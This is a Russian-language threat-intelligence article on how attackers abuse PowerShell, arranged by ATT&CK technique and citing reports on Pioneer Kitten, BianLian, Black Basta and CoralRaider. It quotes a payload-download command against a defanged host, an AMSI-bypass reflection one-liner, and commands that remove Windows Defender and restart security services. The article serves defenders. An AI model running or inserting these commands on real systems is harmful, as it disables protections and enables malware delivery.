PowerShell, встроенный в операционную систему Windows язык сценариев, позволяет системным администраторам автоматизировать создание и управление учетными записями пользователей, изменять конфигурацию системы, контролировать службы и процессы, а также выполнять различные задачи с глубоким доступом к внутренним компонентам Windows. Учитывая широкий спектр возможностей, присущих PowerShell, злоумышленники часто включают его в жизненный цикл атаки.
Использование злоумышленниками PowerShell
Злоумышленники часто избегают установки и использования сторонних программ на взломанных узлах. Такие действия могут легко вызвать корреляционные оповещения в SIEM-продуктах или оставить следы их присутствия в системе. Чтобы избежать обнаружения и провести скрытные атаки, злоумышленники часто используют для выполнения своих команд не сторонние программы, а встроенные утилиты командной строки и сценарии. PowerShell - один из таких встроенных инструментов, часто встречающихся в арсенале злоумышленников.
Злоумышленники используют PowerShell для проведения широкого спектра атак:
Загрузка и выполнение вредоносных полезных нагрузок
Универсальность PowerShell как инструмента для создания команд и сценариев делает его главной мишенью для вредоносной эксплуатации, особенно наглядно это видно на примере действий группы Pioneer Kitten, замеченных в августе 2024 года:
| 1 | Invoke-WebRequest -Uri hxxp://files[.]catbox[.]moe -OutFile C:\Users\Public\m-a-l-w-a-r-e.exe |
Где
- Команда Invoke-WebRequest используется для выполнения HTTP- или HTTPS-запросов к указанным URL-адресам.
- Здесь параметр -Uri указывает PowerShell на доступ к URL hxxp://files[.]catbox[.]moe, сайту, на котором размещены вредоносные полезные нагрузки.
- Параметр -OutFile указывает местоположение и имя загруженного файла, сохраняя его в общедоступном каталоге (C:\Users\Public\) под именем «malware.exe». Это позволяет злоумышленникам незаметно доставить свою полезную нагрузку на целевую систему.
Кроме того, злоумышленники часто сочетают эту технику с Windows PowerShell Web Access для удаленного выполнения команд на взломанных серверах. Такая комбинация позволяет им сохранять контроль над системами, развертывать дополнительные полезные нагрузки или осуществлять утечку данных.
Другой пример: фишинговая кампания, проанализированная Cisco Talos в октябре 2024 года и связанная с доставкой нового вредоносного ПО PowerRAT, показала, как злоумышленники используют PowerShell для выполнения вредоносных действий на скомпрометированных системах Когда жертва открывает вредоносный документ Microsoft Word и активирует его содержимое, запускается встроенный макрос Visual Basic for Applications (VBA). Макрос декодирует скрытые Base64-кодированные данные в документе, извлекая два компонента: вредоносный файл HTML-приложения (HTA) и скрипт-загрузчик PowerShell.
Макрос сохраняет эти компоненты в каталоге профиля пользователя и изменяет ключ реестра Windows HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LOAD для автоматического выполнения файла HTA при входе пользователя в систему. При перезагрузке системы запускается HTA-файл, вызывающий сценарий-загрузчик PowerShell, который впоследствии загружает и выполняет вредоносную программу PowerRAT непосредственно в памяти.
Эта последовательность демонстрирует, как злоумышленники используют возможности PowerShell для бесфайлового исполнения вредоносных программ, избегая тем самым традиционных механизмов обнаружения.
Ослабление защиты (ATT&CK T1562)
Подробнее: MITRE ATT&CK T1562 - Ослабление защиты
PowerShell - излюбленный инструмент злоумышленников благодаря своим широким возможностям и тесной интеграции с операционной системой Windows, позволяющей выполнять вредоносные операции, в том числе отключать критически важные функции безопасности. Универсальность и возможность написания сценариев делают его главной мишенью для злоупотреблений в атаках.
Одним из наглядных примеров, о котором стало известно в ноябре 2024 года, является сценарий на базе PowerShell, приписываемый группе разработчиков вымогательского ПО BianLian, который демонстрирует технику отключения интерфейса сканирования Windows Antimalware Scan Interface (AMSI), основного защитного механизма для обнаружения и предотвращения выполнения вредоносных программ на основе сценариев.
Сценарий использует отражение .NET для обхода AMSI, как показано ниже:
| 1 | [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,* Static').SetValue($null,$true) |
Этот сценарий использует отражательные возможности PowerShell для динамического доступа к классу System.Management.Automation.AmsiUtils и манипулирования приватным статическим полем amsiInitFailed. Это поле отслеживает состояние инициализации AMSI, и, установив его в true, сценарий эффективно отключает AMSI, помечая его как нефункциональный. Обходя AMSI, вредоносные скрипты могут выполняться без проверки и пометки, избегая обнаружения антивирусами и решениями для защиты конечных точек.
Другой пример, приведенный в отчете DFIR, опубликованном в августе 2024 года, связан с эксплуатацией PowerShell такими командно-контрольными фреймворками, как Sliver и PoshC2. Эти фреймворки используют следующие команды для манипулирования основными службами безопасности в системах Windows:
| 1 2 3 | powershell Uninstall-WindowsFeature -Name Windows-Defender powershell restart-service WinDefend -Force powershell restart-service mpssvc -Force |
Эти команды последовательно отключают функцию Защитника Windows, перезапускают службу Защитника Windows и принудительно перезапускают службу Брандмауэра Windows. Такие действия не только нарушают работу встроенных механизмов безопасности, но и делают систему уязвимой для дальнейшей эксплуатации, позволяя злоумышленникам сохранять устойчивость и выполнять вредоносные действия незамеченными.
В нашем последнем примере, в отчете, выпущенном CISA в ноябре 2024 года, описывается тактика, использованная филиалами Black Basta ransomware. Злоумышленники использовали сценарии Powershell для отключения средств обнаружения и реагирования на конечные точки (EDR). Нейтрализуя эти критически важные защитные механизмы, аффилированные лица успешно уклонялись от обнаружения, сохраняли устойчивость и облегчали выполнение своей полезной нагрузки ransomware.
Эти примеры подчеркивают растущую изощренность групп ransomware и необходимость создания надежных средств защиты, способных обнаруживать и нейтрализовывать такие целевые атаки.
Обфусцированные файлы или данные (ATT&CK T1027)
Подробнее: MITRE ATT&CK T1027 - Обфусцированные файлы или данные
Злоумышленники часто используют PowerShell в своих кампаниях, используя его возможности по обфускации и деобфускации, чтобы легко скрыть и выполнить вредоносные скрипты. Ярким примером является расшифровщик PowerShell, используемый в кампании CoralRaider - критический компонент многоступенчатой цепочки заражения, предназначенной для доставки полезной нагрузки вредоносного ПО и ускользания от обнаружения.
В этой кампании, проанализированной в апреле 2024 года, скрипт расшифровщика PowerShell встроен в обфусцированный файл HTML-приложения (HTA). После выполнения он расшифровывает зашифрованный AES блок данных с помощью 256-байтного ключа, полученного из base64-кодированной строки, и 16-байтного вектора инициализации (IV), установленного на все нули. На этом этапе распаковывается сценарий загрузчика PowerShell следующего этапа, который работает полностью в памяти, что сводит к минимуму обнаруживаемые артефакты.
Затем скрипт загрузчика выполняет несколько вредоносных функций, в том числе обходит защиту User Account Control (UAC), используя легитимные двоичные файлы Windows, такие как FoDHelper.exe. Он также изменяет параметры реестра и добавляет определенные каталоги в список исключений Windows Defender, обеспечивая сохранение и незамеченное выполнение последующих этапов.
В конечном итоге кампания загружает и запускает такие похитители информации, как CryptBot, LummaC2 или Rhadamanthys. Сочетая шифрование, обфускацию и использование доверенных системных процессов, расшифровщик PowerShell создает скрытный и эффективный механизм доставки вредоносного ПО, затрудняя обнаружение и анализ атаки традиционными средствами защиты.
Общедоступные инструменты PowerShell, используемые злоумышленниками
Широкие возможности PowerShell сделали его излюбленным инструментом среди «красных команд» и специалистов по тестированию на проникновение, что привело к созданию мощных общедоступных фреймворков и инструментов для «красных команд» и тестирования на проникновение. Яркими примерами являются Empire для тактики постэксплойта, PowerSploit для тестирования безопасности, Nishang с разнообразными функциями атаки, PoshC2 для администрирования серверов и постэксплойта, а также Posh-SecMod для обеспечения безопасности и криминалистики.